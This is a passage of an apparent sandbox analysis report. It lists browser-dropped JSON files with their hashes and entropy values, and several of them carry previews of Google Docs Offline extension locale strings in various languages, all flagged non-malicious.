                                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": "SUKURTI NAUJ.".. },.. "explanationofflinedisabled": {.. "message": "Esate neprisijung.. Jei norite naudoti .Google. dokumentus be interneto ry.io, pagrindiniame .Google. dokument. puslapyje eikite . nustatym. skilt. ir .junkite sinchronizavim. neprisijungus, kai kit. kart. b.site prisijung. prie interneto.".. },.. "explanationofflineenabled": {.. "message": "Esate neprisijung., bet vis tiek galite redaguoti pasiekiamus failus arba sukurti nauj..".. },.. "extdesc": {.. "message": "Redaguokite, kurkite ir per.i.r.kite savo dokumentus, skai.iuokles ir pristatymus . visk. darykite be prieigos prie interneto.".. },.. "extname": {.. "message": ".Google. dokumentai neprisijungus".. },.. "learnmore": {.. "message": "Su.inoti daugiau".. },.. "popuphelptext": {.. "message": "Ra.ykite, redaguokite ir bendradarbiaukite bet kurioje vietoje naudodami interneto ry.. arba
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):994
                                                                                                                                                                                                                                                                Entropy (8bit):4.700308832360794
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:24:1HAaJ7a/uNpoB/Y4vPnswSPkDzLKFQHpp//BpPDB:7J7a/uzQ/Y4vvswhDzDr/LDB
                                                                                                                                                                                                                                                                MD5:A568A58817375590007D1B8ABCAEBF82
                                                                                                                                                                                                                                                                SHA1:B0F51FE6927BB4975FC6EDA7D8A631BF0C1AB597
                                                                                                                                                                                                                                                                SHA-256:0621DE9161748F45D53052ED8A430962139D7F19074C7FFE7223ECB06B0B87DB
                                                                                                                                                                                                                                                                SHA-512:FCFBADEC9F73975301AB404DB6B09D31457FAC7CCAD2FA5BE348E1CAD6800F87CB5B56DE50880C55BBADB3C40423351A6B5C2D03F6A327D898E35F517B1C628C
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": "IZVEIDOT JAUNU".. },.. "explanationofflinedisabled": {.. "message": "J.s esat bezsaist.. Lai lietotu pakalpojumu Google dokumenti bez interneta savienojuma, n.kamaj. reiz., kad ir izveidots savienojums ar internetu, atveriet Google dokumentu s.kumlapas iestat.jumu izv.lni un iesl.dziet sinhroniz.ciju bezsaist..".. },.. "explanationofflineenabled": {.. "message": "J.s esat bezsaist., ta.u varat redi..t pieejamos failus un izveidot jaunus.".. },.. "extdesc": {.. "message": "Redi..jiet, veidojiet un skatiet savus dokumentus, izkl.jlapas un prezent.cijas, neizmantojot savienojumu ar internetu.".. },.. "extname": {.. "message": "Google dokumenti bezsaist.".. },.. "learnmore": {.. "message": "Uzziniet vair.k".. },.. "popuphelptext": {.. "message": "Rakstiet, redi..jiet un sadarbojieties ar interneta savienojumu vai bez t. neatkar.gi no t., kur atrodaties.".. }..}..
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):2091
                                                                                                                                                                                                                                                                Entropy (8bit):4.358252286391144
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:24:1HAnHdGc4LtGxVY6IuVzJkeNL5kP13a67wNcYP8j5PIaSTIjPU4ELFPCWJjMupV/:idGcyYPVtkAUl7wqziBsg9DbpN6XoN/
                                                                                                                                                                                                                                                                MD5:4717EFE4651F94EFF6ACB6653E868D1A
                                                                                                                                                                                                                                                                SHA1:B8A7703152767FBE1819808876D09D9CC1C44450
                                                                                                                                                                                                                                                                SHA-256:22CA9415E294D9C3EC3384B9D08CDAF5164AF73B4E4C251559E09E529C843EA6
                                                                                                                                                                                                                                                                SHA-512:487EAB4938F6BC47B1D77DD47A5E2A389B94E01D29849E38E96C95CABC7BD98679451F0E22D3FEA25C045558CD69FDDB6C4FEF7C581141F1C53C4AA17578D7F7
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):2778
                                                                                                                                                                                                                                                                Entropy (8bit):3.595196082412897
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:48:Y943BFU1LQ4HwQLQ4LQhlmVQL3QUm6H6ZgFIcwn6Rs2ShpQ3IwjGLQSJ/PYoEQj8:I43BCymz8XNcfuQDXYN2sum
                                                                                                                                                                                                                                                                MD5:83E7A14B7FC60D4C66BF313C8A2BEF0B
                                                                                                                                                                                                                                                                SHA1:1CCF1D79CDED5D65439266DB58480089CC110B18
                                                                                                                                                                                                                                                                SHA-256:613D8751F6CC9D3FA319F4B7EA8B2BD3BED37FD077482CA825929DD7C12A69A8
                                                                                                                                                                                                                                                                SHA-512:3742E24FFC4B5283E6EE496813C1BDC6835630D006E8647D427C3DE8B8E7BF814201ADF9A27BFAB3ABD130B6FEC64EBB102AC0EB8DEDFE7B63D82D3E1233305D
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):1719
                                                                                                                                                                                                                                                                Entropy (8bit):4.287702203591075
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:48:65/5EKaDMw6pEf4I5+jSksOTJqQyrFO8C:65/5EKaAw6pEf4I5+vsOVqQyFO8C
                                                                                                                                                                                                                                                                MD5:3B98C4ED8874A160C3789FEAD5553CFA
                                                                                                                                                                                                                                                                SHA1:5550D0EC548335293D962AAA96B6443DD8ABB9F6
                                                                                                                                                                                                                                                                SHA-256:ADEB082A9C754DFD5A9D47340A3DDCC19BF9C7EFA6E629A2F1796305F1C9A66F
                                                                                                                                                                                                                                                                SHA-512:5139B6C6DF9459C7B5CDC08A98348891499408CD75B46519BA3AC29E99AAAFCC5911A1DEE6C3A57E3413DBD0FAE72D7CBC676027248DCE6364377982B5CE4151
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):936
                                                                                                                                                                                                                                                                Entropy (8bit):4.457879437756106
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:24:1HARXIqhmemNKsE27rhdfNLChtyo2JJ/YgTgin:iIqFC7lrDfNLCIBRzn
                                                                                                                                                                                                                                                                MD5:7D273824B1E22426C033FF5D8D7162B7
                                                                                                                                                                                                                                                                SHA1:EADBE9DBE5519BD60458B3551BDFC36A10049DD1
                                                                                                                                                                                                                                                                SHA-256:2824CF97513DC3ECC261F378BFD595AE95A5997E9D1C63F5731A58B1F8CD54F9
                                                                                                                                                                                                                                                                SHA-512:E5B611BBFAB24C9924D1D5E1774925433C65C322769E1F3B116254B1E9C69B6DF1BE7828141EEBBF7524DD179875D40C1D8F29C4FB86D663B8A365C6C60421A7
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": "BUAT BAHARU".. },.. "explanationofflinedisabled": {.. "message": "Anda berada di luar talian. Untuk menggunakan Google Docs tanpa sambungan Internet, pergi ke tetapan di halaman utama Google Docs dan hidupkan penyegerakan luar talian apabila anda disambungkan ke Internet selepas ini.".. },.. "explanationofflineenabled": {.. "message": "Anda berada di luar talian, tetapi anda masih boleh mengedit fail yang tersedia atau buat fail baharu.".. },.. "extdesc": {.. "message": "Edit, buat dan lihat dokumen, hamparan dan pembentangan anda . kesemuanya tanpa akses Internet.".. },.. "extname": {.. "message": "Google Docs Luar Talian".. },.. "learnmore": {.. "message": "Ketahui Lebih Lanjut".. },.. "popuphelptext": {.. "message": "Tulis, edit dan bekerjasama di mana-mana sahaja anda berada, dengan atau tanpa sambungan Internet.".. }..}..
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):3830
                                                                                                                                                                                                                                                                Entropy (8bit):3.5483353063347587
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:48:Ya+Ivxy6ur1+j3P7Xgr5ELkpeCgygyOxONHO3pj6H57ODyOXOVp6:8Uspsj3P3ty2a66xl09
                                                                                                                                                                                                                                                                MD5:342335A22F1886B8BC92008597326B24
                                                                                                                                                                                                                                                                SHA1:2CB04F892E430DCD7705C02BF0A8619354515513
                                                                                                                                                                                                                                                                SHA-256:243BEFBD6B67A21433DCC97DC1A728896D3A070DC20055EB04D644E1BB955FE7
                                                                                                                                                                                                                                                                SHA-512:CD344D060E30242E5A4705547E807CE3CE2231EE983BB9A8AD22B3E7598A7EC87399094B04A80245AD51D039370F09D74FE54C0B0738583884A73F0C7E888AD8
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):1898
                                                                                                                                                                                                                                                                Entropy (8bit):4.187050294267571
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:24:1HAmQ6ZSWfAx6fLMr48tE/cAbJtUZJScSIQoAfboFMiQ9pdvz48YgqG:TQ6W6MbkcAltUJxQdfbqQ9pp0gqG
                                                                                                                                                                                                                                                                MD5:B1083DA5EC718D1F2F093BD3D1FB4F37
                                                                                                                                                                                                                                                                SHA1:74B6F050D918448396642765DEF1AD5390AB5282
                                                                                                                                                                                                                                                                SHA-256:E6ED0A023EF31705CCCBAF1E07F2B4B2279059296B5CA973D2070417BA16F790
                                                                                                                                                                                                                                                                SHA-512:7102B90ABBE2C811E8EE2F1886A73B1298D4F3D5D05F0FFDB57CF78B9A49A25023A290B255BAA4895BB150B388BAFD9F8432650B8C70A1A9A75083FFFCD74F1A
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):914
                                                                                                                                                                                                                                                                Entropy (8bit):4.513485418448461
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:12:1HASvgFARCBxNBv52/fXjOXl6W6ICBxeBvMzU1CSUJAO6SFAIVIbCBhZHdb1tvz+:1HABJx4X6QDwEzlm2uGvYzKU
                                                                                                                                                                                                                                                                MD5:32DF72F14BE59A9BC9777113A8B21DE6
                                                                                                                                                                                                                                                                SHA1:2A8D9B9A998453144307DD0B700A76E783062AD0
                                                                                                                                                                                                                                                                SHA-256:F3FE1FFCB182183B76E1B46C4463168C746A38E461FD25CA91FF2A40846F1D61
                                                                                                                                                                                                                                                                SHA-512:E0966F5CCA5A8A6D91C58D716E662E892D1C3441DAA5D632E5E843839BB989F620D8AC33ED3EDBAFE18D7306B40CD0C4639E5A4E04DA2C598331DACEC2112AAD
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": "NIEUW MAKEN".. },.. "explanationofflinedisabled": {.. "message": "Je bent offline. Wil je Google Documenten zonder internetverbinding gebruiken, ga dan de volgende keer dat je verbinding met internet hebt naar 'Instellingen' op de homepage van Google Documenten en zet 'Offline synchronisatie' aan.".. },.. "explanationofflineenabled": {.. "message": "Je bent offline, maar je kunt nog wel beschikbare bestanden bewerken of nieuwe bestanden maken.".. },.. "extdesc": {.. "message": "Bewerk, maak en bekijk je documenten, spreadsheets en presentaties. Allemaal zonder internettoegang.".. },.. "extname": {.. "message": "Offline Documenten".. },.. "learnmore": {.. "message": "Meer informatie".. },.. "popuphelptext": {.. "message": "Overal schrijven, bewerken en samenwerken, met of zonder internetverbinding.".. }..}..
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):851
                                                                                                                                                                                                                                                                Entropy (8bit):4.4858053753176526
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:12:1HASvgg4eCBxNdN3Pj1NzXW6iFryCBxesJGceKCSUuvNn3AwCBhUufz1tHaXRdAv:1HA3dj/BNzXviFrpj4sNQXJezAa6
                                                                                                                                                                                                                                                                MD5:07FFBE5F24CA348723FF8C6C488ABFB8
                                                                                                                                                                                                                                                                SHA1:6DC2851E39B2EE38F88CF5C35A90171DBEA5B690
                                                                                                                                                                                                                                                                SHA-256:6895648577286002F1DC9C3366F558484EB7020D52BBF64A296406E61D09599C
                                                                                                                                                                                                                                                                SHA-512:7ED2C8DB851A84F614D5DAF1D5FE633BD70301FD7FF8A6723430F05F642CEB3B1AD0A40DE65B224661C782FFCEC69D996EBE3E5BB6B2F478181E9A07D8CD41F6
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": "CREATE NEW".. },.. "explanationofflinedisabled": {.. "message": "You're offline. To use Google Docs without an internet connection, go to settings on the Google Docs homepage and turn on offline sync the next time you're connected to the internet.".. },.. "explanationofflineenabled": {.. "message": "You're offline, but you can still edit available files or create new ones.".. },.. "extdesc": {.. "message": "Edit, create, and view your documents, spreadsheets, and presentations . all without internet access.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Learn More".. },.. "popuphelptext": {.. "message": "Write, edit, and collaborate wherever you are, with or without an internet connection.".. }..}..
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):878
                                                                                                                                                                                                                                                                Entropy (8bit):4.4541485835627475
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:24:1HAqwwrJ6wky68uk+NILxRGJwBvDyrj9V:nwwQwky6W+NwswVyT
                                                                                                                                                                                                                                                                MD5:A1744B0F53CCF889955B95108367F9C8
                                                                                                                                                                                                                                                                SHA1:6A5A6771DFF13DCB4FD425ED839BA100B7123DE0
                                                                                                                                                                                                                                                                SHA-256:21CEFF02B45A4BFD60D144879DFA9F427949A027DD49A3EB0E9E345BD0B7C9A8
                                                                                                                                                                                                                                                                SHA-512:F55E43F14514EECB89F6727A0D3C234149609020A516B193542B5964D2536D192F40CC12D377E70C683C269A1BDCDE1C6A0E634AA84A164775CFFE776536A961
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": "OPPRETT NYTT".. },.. "explanationofflinedisabled": {.. "message": "Du er uten nett. For . bruke Google Dokumenter uten internettilkobling, g. til innstillingene p. Google Dokumenter-nettsiden og sl. p. synkronisering uten nett neste gang du er koblet til Internett.".. },.. "explanationofflineenabled": {.. "message": "Du er uten nett, men du kan likevel endre tilgjengelige filer eller opprette nye.".. },.. "extdesc": {.. "message": "Rediger, opprett og se dokumentene, regnearkene og presentasjonene dine . uten nettilgang.".. },.. "extname": {.. "message": "Google Dokumenter uten nett".. },.. "learnmore": {.. "message": "Finn ut mer".. },.. "popuphelptext": {.. "message": "Skriv, rediger eller samarbeid uansett hvor du er, med eller uten internettilkobling.".. }..}..
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):2766
                                                                                                                                                                                                                                                                Entropy (8bit):3.839730779948262
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:48:YEH6/o0iZbNCbDMUcipdkNtQjsGKIhO9aBjj/nxt9o5nDAj3:p6wbZbEbvJ8jQkIhO9aBjb/90Ab
                                                                                                                                                                                                                                                                MD5:97F769F51B83D35C260D1F8CFD7990AF
                                                                                                                                                                                                                                                                SHA1:0D59A76564B0AEE31D0A074305905472F740CECA
                                                                                                                                                                                                                                                                SHA-256:BBD37D41B7DE6F93948FA2437A7699D4C30A3C39E736179702F212CB36A3133C
                                                                                                                                                                                                                                                                SHA-512:D91F5E2D22FC2D7F73C1F1C4AF79DB98FCFD1C7804069AE9B2348CBC729A6D2DFF7FB6F44D152B0BDABA6E0D05DFF54987E8472C081C4D39315CEC2CBC593816
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):978
                                                                                                                                                                                                                                                                Entropy (8bit):4.879137540019932
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:24:1HApiJiRelvm3wi8QAYcbm24sK+tFJaSDD:FJMx3whxYcbNp
                                                                                                                                                                                                                                                                MD5:B8D55E4E3B9619784AECA61BA15C9C0F
                                                                                                                                                                                                                                                                SHA1:B4A9C9885FBEB78635957296FDDD12579FEFA033
                                                                                                                                                                                                                                                                SHA-256:E00FF20437599A5C184CA0C79546CB6500171A95E5F24B9B5535E89A89D3EC3D
                                                                                                                                                                                                                                                                SHA-512:266589116EEE223056391C65808255EDAE10EB6DC5C26655D96F8178A41E283B06360AB8E08AC3857D172023C4F616EF073D0BEA770A3B3DD3EE74F5FFB2296B
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": "UTW.RZ NOWY".. },.. "explanationofflinedisabled": {.. "message": "Jeste. offline. Aby korzysta. z Dokument.w Google bez po..czenia internetowego, otw.rz ustawienia na stronie g..wnej Dokument.w Google i w..cz synchronizacj. offline nast.pnym razem, gdy b.dziesz mie. dost.p do internetu.".. },.. "explanationofflineenabled": {.. "message": "Jeste. offline, ale nadal mo.esz edytowa. dost.pne pliki i tworzy. nowe.".. },.. "extdesc": {.. "message": "Edytuj, tw.rz i wy.wietlaj swoje dokumenty, arkusze kalkulacyjne oraz prezentacje bez konieczno.ci ..czenia si. z internetem.".. },.. "extname": {.. "message": "Dokumenty Google offline".. },.. "learnmore": {.. "message": "Wi.cej informacji".. },.. "popuphelptext": {.. "message": "Pisz, edytuj i wsp..pracuj, gdziekolwiek jeste. . niezale.nie od tego, czy masz po..czenie z internetem.".. }..}..
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):907
                                                                                                                                                                                                                                                                Entropy (8bit):4.599411354657937
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:12:1HASvgU30CBxNd6GwXOK1styCJ02OK9+4KbCBxed6X4LBAt4rXgUCSUuYDHIIQka:1HAcXlyCJ5+Tsz4LY4rXSw/Q+ftkC
                                                                                                                                                                                                                                                                MD5:608551F7026E6BA8C0CF85D9AC11F8E3
                                                                                                                                                                                                                                                                SHA1:87B017B2D4DA17E322AF6384F82B57B807628617
                                                                                                                                                                                                                                                                SHA-256:A73EEA087164620FA2260D3910D3FBE302ED85F454EDB1493A4F287D42FC882F
                                                                                                                                                                                                                                                                SHA-512:82F52F8591DB3C0469CC16D7CBFDBF9116F6D5B5D2AD02A3D8FA39CE1378C64C0EA80AB8509519027F71A89EB8BBF38A8702D9AD26C8E6E0F499BF7DA18BF747
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": "CRIAR NOVO".. },.. "explanationofflinedisabled": {.. "message": "Voc. est. off-line. Para usar o Documentos Google sem conex.o com a Internet, na pr.xima vez que se conectar, acesse as configura..es na p.gina inicial do Documentos Google e ative a sincroniza..o off-line.".. },.. "explanationofflineenabled": {.. "message": "Voc. est. off-line, mas mesmo assim pode editar os arquivos dispon.veis ou criar novos arquivos.".. },.. "extdesc": {.. "message": "Edite, crie e veja seus documentos, planilhas e apresenta..es sem precisar de acesso . Internet.".. },.. "extname": {.. "message": "Documentos Google off-line".. },.. "learnmore": {.. "message": "Saiba mais".. },.. "popuphelptext": {.. "message": "Escreva, edite e colabore onde voc. estiver, com ou sem conex.o com a Internet.".. }..}..
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):914
                                                                                                                                                                                                                                                                Entropy (8bit):4.604761241355716
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:24:1HAcXzw8M+N0STDIjxX+qxCjKw5BKriEQFMJXkETs:zXzw0pKXbxqKw5BKri3aNY
                                                                                                                                                                                                                                                                MD5:0963F2F3641A62A78B02825F6FA3941C
                                                                                                                                                                                                                                                                SHA1:7E6972BEAB3D18E49857079A24FB9336BC4D2D48
                                                                                                                                                                                                                                                                SHA-256:E93B8E7FB86D2F7DFAE57416BB1FB6EE0EEA25629B972A5922940F0023C85F90
                                                                                                                                                                                                                                                                SHA-512:22DD42D967124DA5A2209DD05FB6AD3F5D0D2687EA956A22BA1E31C56EC09DEB53F0711CD5B24D672405358502E9D1C502659BB36CED66CAF83923B021CA0286
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": "CRIAR NOVO".. },.. "explanationofflinedisabled": {.. "message": "Est. offline. Para utilizar o Google Docs sem uma liga..o . Internet, aceda .s defini..es na p.gina inicial do Google Docs e ative a sincroniza..o offline da pr.xima vez que estiver ligado . Internet.".. },.. "explanationofflineenabled": {.. "message": "Est. offline, mas continua a poder editar os ficheiros dispon.veis ou criar novos ficheiros.".. },.. "extdesc": {.. "message": "Edite, crie e veja os documentos, as folhas de c.lculo e as apresenta..es, tudo sem precisar de aceder . Internet.".. },.. "extname": {.. "message": "Google Docs offline".. },.. "learnmore": {.. "message": "Saber mais".. },.. "popuphelptext": {.. "message": "Escreva edite e colabore onde quer que esteja, com ou sem uma liga..o . Internet.".. }..}..
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):937
                                                                                                                                                                                                                                                                Entropy (8bit):4.686555713975264
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:24:1HA8dC6e6w+uFPHf2TFMMlecFpweWV4RE:pC6KvHf4plVweCx
                                                                                                                                                                                                                                                                MD5:BED8332AB788098D276B448EC2B33351
                                                                                                                                                                                                                                                                SHA1:6084124A2B32F386967DA980CBE79DD86742859E
                                                                                                                                                                                                                                                                SHA-256:085787999D78FADFF9600C9DC5E3FF4FB4EB9BE06D6BB19DF2EEF8C284BE7B20
                                                                                                                                                                                                                                                                SHA-512:22596584D10707CC1C8179ED3ABE46EF2C314CF9C3D0685921475944B8855AAB660590F8FA1CFDCE7976B4BB3BD9ABBBF053F61F1249A325FD0094E1C95692ED
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": "CREEAZ. UN DOCUMENT".. },.. "explanationofflinedisabled": {.. "message": "E.ti offline. Pentru a utiliza Documente Google f.r. conexiune la internet, intr. .n set.rile din pagina principal. Documente Google .i activeaz. sincronizarea offline data viitoare c.nd e.ti conectat(.) la internet.".. },.. "explanationofflineenabled": {.. "message": "E.ti offline, dar po.i .nc. s. editezi fi.ierele disponibile sau s. creezi altele.".. },.. "extdesc": {.. "message": "Editeaz., creeaz. .i acceseaz. documente, foi de calcul .i prezent.ri - totul f.r. acces la internet.".. },.. "extname": {.. "message": "Documente Google Offline".. },.. "learnmore": {.. "message": "Afl. mai multe".. },.. "popuphelptext": {.. "message": "Scrie, editeaz. .i colaboreaz. oriunde ai fi, cu sau f.r. conexiune la internet.".. }..}..
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):1337
                                                                                                                                                                                                                                                                Entropy (8bit):4.69531415794894
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:24:1HABEapHTEmxUomjsfDVs8THjqBK8/hHUg41v+Lph5eFTHQ:I/VdxUomjsre8Kh4Riph5eFU
                                                                                                                                                                                                                                                                MD5:51D34FE303D0C90EE409A2397FCA437D
                                                                                                                                                                                                                                                                SHA1:B4B9A7B19C62D0AA95D1F10640A5FBA628CCCA12
                                                                                                                                                                                                                                                                SHA-256:BE733625ACD03158103D62BC0EEF272CA3F265AC30C87A6A03467481A177DAE3
                                                                                                                                                                                                                                                                SHA-512:E8670DED44DC6EE30E5F41C8B2040CF8A463CD9A60FC31FA70EB1D4C9AC1A3558369792B5B86FA761A21F5266D5A35E5C2C39297F367DAA84159585C19EC492A
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):2846
                                                                                                                                                                                                                                                                Entropy (8bit):3.7416822879702547
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:48:YWi+htQTKEQb3aXQYJLSWy7sTQThQTnQtQTrEmQ6kiLsegQSJFwsQGaiPn779I+S:zhiTK5b3tUGVjTGTnQiTryOLpyaxYf/S
                                                                                                                                                                                                                                                                MD5:B8A4FD612534A171A9A03C1984BB4BDD
                                                                                                                                                                                                                                                                SHA1:F513F7300827FE352E8ECB5BD4BB1729F3A0E22A
                                                                                                                                                                                                                                                                SHA-256:54241EBE651A8344235CC47AFD274C080ABAEBC8C3A25AFB95D8373B6A5670A2
                                                                                                                                                                                                                                                                SHA-512:C03E35BFDE546AEB3245024EF721E7E606327581EFE9EAF8C5B11989D9033BDB58437041A5CB6D567BAA05466B6AAF054C47F976FD940EEEDF69FDF80D79095B
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):934
                                                                                                                                                                                                                                                                Entropy (8bit):4.882122893545996
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:24:1HAF8pMv1RS4LXL22IUjdh8uJwpPqLDEtxKLhSS:hyv1RS4LXx38u36QsS
                                                                                                                                                                                                                                                                MD5:8E55817BF7A87052F11FE554A61C52D5
                                                                                                                                                                                                                                                                SHA1:9ABDC0725FE27967F6F6BE0DF5D6C46E2957F455
                                                                                                                                                                                                                                                                SHA-256:903060EC9E76040B46DEB47BBB041D0B28A6816CB9B892D7342FC7DC6782F87C
                                                                                                                                                                                                                                                                SHA-512:EFF9EC7E72B272DDE5F29123653BC056A4BC2C3C662AE3C448F8CB6A4D1865A0679B7E74C1B3189F3E262109ED6BC8F8D2BDE14AEFC8E87E0F785AE4837D01C7
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": "VYTVORI. NOV.".. },.. "explanationofflinedisabled": {.. "message": "Ste offline. Ak chcete pou.i. Dokumenty Google bez pripojenia na internet, po najbli..om pripojen. na internet prejdite do nastaven. na domovskej str.nke Dokumentov Google a.zapnite offline synchroniz.ciu.".. },.. "explanationofflineenabled": {.. "message": "Ste offline, no st.le m..ete upravova. dostupn. s.bory a.vytv.ra. nov..".. },.. "extdesc": {.. "message": ".prava, tvorba a.zobrazenie dokumentov, tabuliek a.prezent.ci.. To v.etko bez pr.stupu na internet.".. },.. "extname": {.. "message": "Dokumenty Google v re.ime offline".. },.. "learnmore": {.. "message": ".al.ie inform.cie".. },.. "popuphelptext": {.. "message": "P..te, upravujte a.spolupracuje, kdeko.vek ste, a.to s.pripojen.m na internet aj bez neho.".. }..}..
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):963
                                                                                                                                                                                                                                                                Entropy (8bit):4.6041913416245
